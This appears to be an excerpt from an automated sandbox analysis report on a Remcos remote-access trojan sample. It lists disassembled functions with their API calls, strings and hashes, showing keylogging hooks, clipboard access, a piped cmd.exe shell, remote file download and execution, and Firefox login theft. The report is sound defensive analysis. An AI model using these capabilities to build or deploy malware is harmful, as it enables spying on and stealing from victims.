                                                              • Opcode Fuzzy Hash: f381acc57b18326798f2834ebe4b01d6af47cbd4c864df868b39ddfebfc84843
                                                              • Instruction Fuzzy Hash: 28F06D3264211CBBDF00EFA4EC14EEE776CEF54651F108665BE09AA110EB329E14AB90
                                                              Function 030A1F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 030A1F54
                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,03102200), ref: 030A1F72
                                                              • RegCloseKey.KERNEL32(?), ref: 030A1F7D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: pth_unenc
                                                              • API String ID: 3677997916-4028850238
                                                              • Opcode ID: 91850bfb108aac8ea659f8cfa7cfb61ecee830b183e4d4a59504a0e95388fa6e
                                                              • Instruction ID: e45f6e3359a8ea98f0f2fb5fcb6987762bce3769e04f89a9765d0dca10cf60d1
                                                              • Opcode Fuzzy Hash: 91850bfb108aac8ea659f8cfa7cfb61ecee830b183e4d4a59504a0e95388fa6e
                                                              • Instruction Fuzzy Hash: 0BF01D76A0121CBFDF109FE4AD45FEE7BBCEB04B11F1041A5BA05EA141D7355A149B90
                                                              Function 0309966D Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,03099745), ref: 030996A3
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,03099745), ref: 030996B2
                                                              • Sleep.KERNEL32(00002710,?,?,?,03099745), ref: 030996DF
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,03099745), ref: 030996E6
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                              • String ID:
                                                              • API String ID: 1958988193-0
                                                              • Opcode ID: 067a01af671d6e6e34006c845c7d9203a0b03ce1eb545c4928e57acf9b78c6cc
                                                              • Instruction ID: f8f68ca5b887b0036144c399837fd656ec2c9c77592efcda4542e8671eb5b8f4
                                                              • Opcode Fuzzy Hash: 067a01af671d6e6e34006c845c7d9203a0b03ce1eb545c4928e57acf9b78c6cc
                                                              • Instruction Fuzzy Hash: 3E113A307077406BFF76FB74A99CA2EBB9BA78A304F08080EE2814A585C7695455D322
                                                              Function 030A1F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,00000000,00000000,00000000), ref: 030A1FB5
                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 030A1FD2
                                                              • RegCloseKey.KERNEL32(00000000), ref: 030A1FDD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: dce2a0f86e62b06d6f418eaf454ab30d973fac24e009df2868f0074f3d4d6c7d
                                                              • Instruction ID: 1304e19ca617f6496e88b24e4aaf27622632ff95471e158686699d527bb01e0f
                                                              • Opcode Fuzzy Hash: dce2a0f86e62b06d6f418eaf454ab30d973fac24e009df2868f0074f3d4d6c7d
                                                              • Instruction Fuzzy Hash: CC01A27AA0212CBBCB209A95EC08DEF7BBDDB84651F004096BB05A6100DB719A16DBA0
                                                              Function 030A20E8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,03102200), ref: 030A2104
                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 030A211D
                                                              • RegCloseKey.KERNEL32(00000000), ref: 030A2128
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: 7c48682f102573a01ff2a03a9d263598dd26e205333b262c42e22faa757c7511
                                                              • Instruction ID: 36b98bf32335366c2fd08ba89162778f458188762de0df49178beac80594d998
                                                              • Opcode Fuzzy Hash: 7c48682f102573a01ff2a03a9d263598dd26e205333b262c42e22faa757c7511
                                                              • Instruction Fuzzy Hash: DE018B3580212CBBCF21AF94EC08DEF3F2CEF54761F0040A0BA0866110D73689A9EBA0
                                                              Function 030A9797 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 030A97AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID: @
                                                              • API String ID: 1890195054-2766056989
                                                              • Opcode ID: 475e8f45d215e6460af1abce7227108f3eea76f4c61dc4c74b5da2c2579ea872
                                                              • Instruction ID: 587cd23102cdcdfb4d16d247628c801a2538adc349c3a3cbc77ab93e1e008089
                                                              • Opcode Fuzzy Hash: 475e8f45d215e6460af1abce7227108f3eea76f4c61dc4c74b5da2c2579ea872
                                                              • Instruction Fuzzy Hash: 56D012B5801318DFC720DF98E94458DB7FCFB08214F000569EC49E3300D774A8008B90
                                                              Function 030D0C8C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: c5e83f2bd3cd9601e39e3acfc4ffe1b163aaedd6eba71807d5215bd62b1e19e7
                                                              • Instruction ID: 4199361dfedbfbc86564199bc85c83de89a212fce4875aecffcc4a04eb021676
                                                              • Opcode Fuzzy Hash: c5e83f2bd3cd9601e39e3acfc4ffe1b163aaedd6eba71807d5215bd62b1e19e7
                                                              • Instruction Fuzzy Hash: 61E0E52E607B2158D2A1F33E7C047AE16C48BC1375F155265E8288F5C8DF6484038562
                                                              Function 0309163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                              • Instruction ID: 16a046033c77d718100d434db9e379a81e4bb9c31cdfb1e690d846852092bf08
                                                              • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                              • Instruction Fuzzy Hash: 3EF0A7B1B1734269EF5CD734C85466E779A4B84251F288EAFF05BC54D0D730C895D604
                                                              Function 030A9A77 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,031024A0), ref: 030A9A9B
                                                              • GetWindowTextW.USER32(00000000,?,00000200), ref: 030A9AAA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$ForegroundText
                                                              • String ID:
                                                              • API String ID: 29597999-0
                                                              • Opcode ID: 290937059104e2001562e3002550714c3fe35b914ecb7ee3df89fea45d521205
                                                              • Instruction ID: 165c2614eda5ea4da789d96853f62e324a500310a57d9fdcd4740430fd23d662
                                                              • Opcode Fuzzy Hash: 290937059104e2001562e3002550714c3fe35b914ecb7ee3df89fea45d521205
                                                              • Instruction Fuzzy Hash: CFE09B76E0131C27EB20A6AAFC4DFEBB77CEB90710F04019AF518C7141E9655D0586E0
                                                              Function 03098F1F Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 03098F39
                                                                • Part of subcall function 03099203: CreateThread.KERNEL32(00000000,00000000,03099305,?,00000000,00000000), ref: 0309928B
                                                                • Part of subcall function 03099203: CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 0309929B
                                                                • Part of subcall function 03099203: CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 030992A7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$_wcslen
                                                              • String ID:
                                                              • API String ID: 1119755333-0
                                                              • Opcode ID: aaab440111410d7c56923a56402dd1f69cc801ab6d231274b7b29b19cad54166
                                                              • Instruction ID: c539ebcba7693c391c7f8e27448bbc4a0473044bb84537d369eae0da108d2c10
                                                              • Opcode Fuzzy Hash: aaab440111410d7c56923a56402dd1f69cc801ab6d231274b7b29b19cad54166
                                                              • Instruction Fuzzy Hash: 4521D839A0634A5FEF09FFB4D9519FE7BB9AF85200F00041BE4016A295DF30564AE791
                                                              Function 030993EF Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CallNextHookEx.USER32(03102008,?,?,?), ref: 0309945A
                                                                • Part of subcall function 0309A592: GetKeyState.USER32(00000011), ref: 0309A597
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallHookNextState
                                                              • String ID:
                                                              • API String ID: 3280314413-0
                                                              • Opcode ID: e20f556008663d474a30b475c3a14a7a2953230e6ac7fd1225d414ae9cd0ec36
                                                              • Instruction ID: 50f2a6418da12df400d00c778003ce222b6e921a0c82fc963412a81747179961
                                                              • Opcode Fuzzy Hash: e20f556008663d474a30b475c3a14a7a2953230e6ac7fd1225d414ae9cd0ec36
                                                              • Instruction Fuzzy Hash: 57F0D1363063059AFE46FE789C449AEB7DAEBD5210F00446FE6024A961CB618804A652
                                                              Function 030D3649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 9ace0ed03f6fe2797654ddcd146a6985ede45e8244fbb4891162fcf15d9a2753
                                                              • Instruction ID: d4112fe2aa21db435f0effc1411fd6f58a1b9c806bbef3061bb0780d9e21e639
                                                              • Opcode Fuzzy Hash: 9ace0ed03f6fe2797654ddcd146a6985ede45e8244fbb4891162fcf15d9a2753
                                                              • Instruction Fuzzy Hash: 46E0652D2133256BDAE1E6655C04B9F76CCDF816E1F0EC6A5AC459A6C0CB61C80045A6
                                                              Function 030B4A66 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID:
                                                              • API String ID: 1507349165-0
                                                              • Opcode ID: 2c679946ebfe889a07455d35dc476190873b97e23a598303c012bc6d630fd2bf
                                                              • Instruction ID: 882367fdf651338cf0a0b45d99554feab37f896e35f8b7f85e684fcdbdb4e7f5
                                                              • Opcode Fuzzy Hash: 2c679946ebfe889a07455d35dc476190873b97e23a598303c012bc6d630fd2bf
                                                              • Instruction Fuzzy Hash: 7DB09BB5106105FFDA051750DC0486F7DB997C8780B004C0CB14640120C53684505711
                                                              Function 030B4A7D Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 027b135839ddd45c6965ebd52977b17fe7de1c1d1f981170cbc1558098a5dce8
                                                              • Instruction ID: 1a373b4ea05447ca3f150aa172be91d8be20b7cc243b5e636043ee510eb2eee0
                                                              • Opcode Fuzzy Hash: 027b135839ddd45c6965ebd52977b17fe7de1c1d1f981170cbc1558098a5dce8
                                                              • Instruction Fuzzy Hash: 1DB09BB5105205FFDA061750DC0486F7D75A7C8780B004C0CF15640120C53684505711
                                                              Function 03094CA3 Relevance: 1.4, APIs: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 03094DBB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a375082d7121d4c1aa2dcfa7db829af81c7ff7023ea315dfba71a08dc2242d71
                                                              • Instruction ID: 0b0ce59036b742d59b23aec6fecbf1c31ccc3dbc871d2a07b00e0ffa6027eb62
                                                              • Opcode Fuzzy Hash: a375082d7121d4c1aa2dcfa7db829af81c7ff7023ea315dfba71a08dc2242d71
                                                              • Instruction Fuzzy Hash: 5C41E47520A305AFEF14FB61DC10DBFB7EDAFD4310F040A1EB88686290DB249909A751

                                                              Non-executed Functions

                                                              Function 03096D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 03096D4A
                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 03096E18
                                                              • DeleteFileW.KERNEL32(00000000), ref: 03096E3A
                                                                • Part of subcall function 030AA01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA076
                                                                • Part of subcall function 030AA01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0A6
                                                                • Part of subcall function 030AA01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0FB
                                                                • Part of subcall function 030AA01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA15C
                                                                • Part of subcall function 030AA01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA163
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 03097228
                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 03097309
                                                              • DeleteFileA.KERNEL32(?), ref: 0309768E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Find$DeleteDirectoryRemove$AttributesCloseDriveEventExecuteFirstLocalLogicalNextShellStringsTime
                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                              • API String ID: 3077191444-1507758755
                                                              • Opcode ID: be7319d95ea1e4fd1274392da82472575ed83c5ae26d9a37445ae003a7cf4465
                                                              • Instruction ID: 8ee6df69bba9a87f2f533e3058038e0d7fd53cee0ded08c28be944cf8d548844
                                                              • Opcode Fuzzy Hash: be7319d95ea1e4fd1274392da82472575ed83c5ae26d9a37445ae003a7cf4465
                                                              • Instruction Fuzzy Hash: BC42B53A7063056FEE08FB78C865AEE77A8AFD1600F400D5EE5424F5D1EE219909E792
                                                              Function 0309567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 030956C6
                                                              • __Init_thread_footer.LIBCMT ref: 03095703
                                                              • CreatePipe.KERNEL32(03103BB4,03103B9C,03103AC0,00000000,030F3068,00000000), ref: 03095796
                                                              • CreatePipe.KERNEL32(03103BA0,03103BBC,03103AC0,00000000), ref: 030957AC
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,03103AD0,03103BA4), ref: 0309581F
                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 03095877
                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0309589C
                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 030958C9
                                                                • Part of subcall function 030C2525: __onexit.LIBCMT ref: 030C252B
                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,03101F28,030F306C,00000062,030F3050), ref: 030959C4
                                                              • Sleep.KERNEL32(00000064,00000062,030F3050), ref: 030959DE
                                                              • TerminateProcess.KERNEL32(00000000), ref: 030959F7
                                                              • CloseHandle.KERNEL32 ref: 03095A03
                                                              • CloseHandle.KERNEL32 ref: 03095A0B
                                                              • CloseHandle.KERNEL32 ref: 03095A1D
                                                              • CloseHandle.KERNEL32 ref: 03095A25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexit
                                                              • String ID: SystemDrive$cmd.exe
                                                              • API String ID: 618029711-3633465311
                                                              • Opcode ID: 826162d9882802087ec63f310cb1aede4711f42725d34a0a0b6c308052f835de
                                                              • Instruction ID: 4e5561e3f58ae42b91acbf645494a694a04be68499580910c0d4fc49c44e601e
                                                              • Opcode Fuzzy Hash: 826162d9882802087ec63f310cb1aede4711f42725d34a0a0b6c308052f835de
                                                              • Instruction Fuzzy Hash: 3C913A79602308BFEE09FB25EC50D6E7BACEBC9608F00082FF5559B681DBA59C449761
                                                              Function 030A0B5C Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32 ref: 030A0B6B
                                                                • Part of subcall function 030A2268: RegCreateKeyA.ADVAPI32(80000001,00000000,030F3050), ref: 030A2276
                                                                • Part of subcall function 030A2268: RegSetValueExA.ADVAPI32(030F3050,000000AF,00000000,00000004,00000001,00000004,?,?,?,0309B093,030F38E0,00000001,000000AF,030F3050), ref: 030A2291
                                                                • Part of subcall function 030A2268: RegCloseKey.ADVAPI32(030F3050,?,?,?,0309B093,030F38E0,00000001,000000AF,030F3050), ref: 030A229C
                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 030A0BAB
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A0BBA
                                                              • CreateThread.KERNEL32(00000000,00000000,030A1253,00000000,00000000,00000000), ref: 030A0C10
                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 030A0E7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                              • API String ID: 3018269243-13974260
                                                              • Opcode ID: 3d43e59d17cfa3721b5607157b5bc3a219658aa5d3e0a8c705e951cde6a62357
                                                              • Instruction ID: b94ce57a2c798d46c65c4d1e1140ca8664681efc3ddc1d285e146ece1881687f
                                                              • Opcode Fuzzy Hash: 3d43e59d17cfa3721b5607157b5bc3a219658aa5d3e0a8c705e951cde6a62357
                                                              • Instruction Fuzzy Hash: C071E6397063055FEA08FBB4EC55EEE77A8AFD1200F40091EF4525F191EF609A09D692
                                                              Function 0309AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0309AAF0
                                                              • FindClose.KERNEL32(00000000), ref: 0309AB0A
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0309AC2D
                                                              • FindClose.KERNEL32(00000000), ref: 0309AC53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                              • API String ID: 1164774033-3681987949
                                                              • Opcode ID: bd0007a41aa4bbb6b2ae65112e4e62f9e73bf341e44d113e3c9c5406ebe1d504
                                                              • Instruction ID: ee62fdde511b770c70decb5a6c78ba8d7d4049cca32a3026ebc1cfe2941581ae
                                                              • Opcode Fuzzy Hash: bd0007a41aa4bbb6b2ae65112e4e62f9e73bf341e44d113e3c9c5406ebe1d504
                                                              • Instruction Fuzzy Hash: CC51B135A0630E9FEF18FBB4EC65DEEB778AF91210F00055BE4066E092EF346A45DA41
                                                              Function 030A4EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32 ref: 030A4EC2
                                                              • EmptyClipboard.USER32 ref: 030A4ED0
                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 030A4EF0
                                                              • GlobalLock.KERNEL32(00000000), ref: 030A4EF9
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 030A4F2F
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 030A4F38
                                                              • CloseClipboard.USER32 ref: 030A4F55
                                                              • OpenClipboard.USER32 ref: 030A4F5C
                                                              • GetClipboardData.USER32(0000000D), ref: 030A4F6C
                                                              • GlobalLock.KERNEL32(00000000), ref: 030A4F75
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 030A4F7E
                                                              • CloseClipboard.USER32 ref: 030A4F84
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmpty
                                                              • String ID:
                                                              • API String ID: 2339235153-0
                                                              • Opcode ID: faa7d8d145f514b3b7062f7ece2fd26599592c8d642fa424e05a01c2be8de7c4
                                                              • Instruction ID: 71b9fd76f9d7e2f76c1ab7324b554179d1389fee179ba51a46a104f384d4b50b
                                                              • Opcode Fuzzy Hash: faa7d8d145f514b3b7062f7ece2fd26599592c8d642fa424e05a01c2be8de7c4
                                                              • Instruction Fuzzy Hash: 3221A6353473045BEB04FBB4FC58ABE77A8EFE1A01F04085EF5478A185EF3548059A62
                                                              Function 030AA01B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA076
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0A6
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,03102200,00000001), ref: 030AA118
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,03102200,00000001), ref: 030AA125
